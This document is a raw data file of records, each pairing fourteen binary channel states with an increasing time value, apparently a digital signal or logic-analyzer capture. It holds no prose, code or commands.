0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731308e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731388e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731468e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731512e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731532e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731556e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731580e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731604e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731624e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731756e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731780e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731804e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731828e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731848e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731872e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731916e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731940e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731964e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731984e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732004e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732028e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732052e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732076e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732096e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732116e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732144e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732168e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732268e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732316e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732344e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732368e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732396e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732468e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732516e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732544e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732568e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732644e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732744e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732768e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732820e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732944e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7732968e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7732996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7733020e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7733044e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7733068e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,3.7733072e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7733076e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.7857748e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,3.7857956e-02 1,1,1,1,0,1,0,0,0,1,0,1,0,1,3.7857988e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,3.7858012e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,1,3.7858324e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,3.7858348e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,1,3.7858352e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7858356e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,3.7858372e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7858396e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,3.7858424e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7858452e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,3.7858476e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7858500e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,3.7858524e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7858556e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7858580e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7858604e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7858628e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7858652e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7858680e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7858704e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7858708e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7858728e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7858756e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,3.7858760e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7858764e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7858780e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7858804e-02 1,1,1,1,0,0,0,0,0,1,0,0,0,0,3.7858808e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7858812e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7858860e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7858880e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,3.7858888e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7858892e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7858904e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7858928e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7858956e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7858980e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859004e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859028e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859052e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859076e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859132e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859156e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859204e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859228e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859280e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859304e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859356e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859380e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859404e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859428e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859452e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859476e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7859484e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7859532e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7859556e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859564e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859580e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859604e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859652e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859680e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859732e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859756e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859804e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859828e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859852e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859876e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859904e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7859928e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7859980e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860004e-02 1,1,1,1,0,0,0,0,0,1,0,0,0,0,3.7860008e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7860012e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7860052e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,3.7860084e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860088e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860132e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860156e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860208e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860232e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860256e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860284e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860308e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860332e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860356e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860380e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860404e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860432e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860456e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860484e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860508e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860532e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860580e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860604e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7860612e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7860632e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7860656e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860664e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860684e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860708e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860732e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860756e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860808e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860832e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860856e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7860932e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7860956e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861004e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861032e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861084e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861108e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861132e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861156e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861184e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861208e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861236e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861260e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861284e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861308e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861332e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861356e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861384e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861408e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861436e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861460e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861484e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861508e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861532e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861556e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861584e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861608e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7861612e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7861636e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7861660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861668e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861684e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861708e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7861716e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7861760e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7861784e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861792e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861912e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861936e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7861964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7861988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862036e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862060e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862112e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862136e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862188e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862212e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862260e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862284e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862312e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862336e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862436e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862460e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7862468e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7862512e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7862536e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862544e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862588e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862612e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862712e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862736e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862764e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862912e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862936e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7862964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7862988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863012e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863036e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863060e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863084e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863112e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863136e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863164e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863288e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863312e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863436e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863460e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863512e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863536e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863564e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863588e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863636e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863740e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863764e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863888e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863912e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7863964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7863988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864012e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864036e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864060e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864084e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864112e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864136e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864164e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864260e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864284e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864312e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864336e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864412e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864436e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864460e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864484e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864512e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864536e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864564e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864588e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864636e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864688e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864716e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864740e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864764e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864864e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864888e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864916e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864940e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7864964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7864988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865012e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865036e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865064e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865088e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865116e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865140e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865164e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865264e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865288e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865316e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865340e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865412e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865436e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865464e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865488e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865540e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7865564e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7865588e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7865596e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,3.7989652e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,3.7989844e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.7989868e-02 0,0,0,0,1,1,0,0,0,1,0,1,0,1,3.7989900e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.7989920e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,1,3.7990236e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.7990260e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.7990268e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,3.7990284e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.7990312e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,3.7990336e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.7990364e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,3.7990388e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.7990412e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,3.7990436e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.7990460e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7990484e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7990512e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7990536e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7990564e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7990588e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7990612e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7990636e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7990660e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7990684e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7990712e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7990716e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7990764e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7990788e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7990796e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7990812e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7990836e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7990860e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7990884e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7990912e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7990936e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7990988e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7991012e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,3.7991016e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991020e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991036e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991060e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991084e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991112e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991136e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991164e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.7991188e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7991212e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7991220e-02 